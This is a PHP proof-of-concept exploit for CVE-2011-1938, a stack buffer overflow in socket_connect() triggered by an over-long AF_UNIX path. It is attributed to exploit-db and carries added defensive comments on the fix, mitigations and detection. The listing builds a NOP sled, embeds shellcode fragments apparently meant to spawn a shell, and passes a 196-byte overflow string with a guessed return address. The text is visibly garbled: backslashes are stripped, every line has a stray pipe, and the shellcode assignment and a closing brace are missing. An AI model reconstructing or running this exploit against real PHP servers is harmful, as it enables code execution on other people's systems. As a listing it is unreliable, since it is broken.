<?php
// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian |
// Affected Versions: 5.3.3-5.3.6 |
//
// Proof of concept for CVE-2011-1938, a stack-based buffer overflow in PHP's
// socket_connect() when it is given an over-long AF_UNIX socket path.
//
// NOTE(review): this listing is damaged by extraction and does not parse as shown:
//   - every line carries a stray trailing " |";
//   - escape backslashes are gone ("...n" was a newline escape, "x90" was a hex escape);
//   - the statement that assigns $SHELLCODE is missing, leaving only two string fragments;
//   - the for loop's closing brace is missing.
// Read it as a description of the trigger, not as a runnable script.
//
// Defender's view: code must already be executing inside the PHP interpreter to reach
// this bug, so it presumably matters most where untrusted PHP runs under restrictions
// (e.g. shared hosting) - verify against your deployment. Mitigations: run a PHP
// release newer than the affected range above, and where the sockets extension is not
// needed, leave it unloaded or list the socket_* functions in disable_functions.
echo "[+] CVE-2011-1938"; |
echo "[+] there we go...n"; |
// Four-byte value appended after the padding further down. The final status message
// ("if you picked the right address") indicates it is a guessed address and that the
// PoC is not expected to be reliable.
define('EVIL_SPACE_ADDR', "xffxffxeexb3"); |
// 8 MiB: size of the large string built below.
define('EVIL_SPACE_SIZE', 1024*1024*8); |
// Orphaned tail of a string concatenation. The assignment it belonged to (the code
// below reads it as $SHELLCODE) is not present in this listing.
"x6ax31x58x99xcdx80x89xc3x89xc1x6ax46x58xcdx80xb0". |
"x0bx52x68x6ex2fx73x68x68x2fx2fx62x69x89xe3x89xd1". |
echo "[+] creating the sled.n"; |
// Allocate an EVIL_SPACE_SIZE-byte string of one repeated filler byte...
$CODE = str_repeat("x90", EVIL_SPACE_SIZE); |
// ...then overwrite bytes near its end, one at a time, with the bytes of $SHELLCODE
// ($j starts strlen($SHELLCODE) + 1 positions before the end of the string).
for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ; |
$i < strlen($SHELLCODE) ; $i++, $j++) { |
$CODE[$j] = $SHELLCODE[$i]; |
// The trigger: a socket "path" of 196 filler bytes followed by EVIL_SPACE_ADDR. That is
// well beyond the fixed-size sun_path field of struct sockaddr_un (108 bytes on Linux).
// The affected versions copy the caller's string into that field without bounding its
// length, so the fix is a length check before the copy.
$b = str_repeat("A", 196).EVIL_SPACE_ADDR; |
// AF_UNIX stream socket; the address passed to socket_connect() is treated as a path.
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1); |
echo "[+] popping shell, have fun (if you picked the right address...)n"; |
// The overflow happens inside this call on affected versions. Detection idea: PHP
// worker crashes (SIGSEGV) correlated with scripts that call socket_connect() on an
// AF_UNIX socket with an address longer than a valid socket path.
$var85 = socket_connect($var79,$b); |
?>
Source: http://www.exploit-db.com/exploits/17318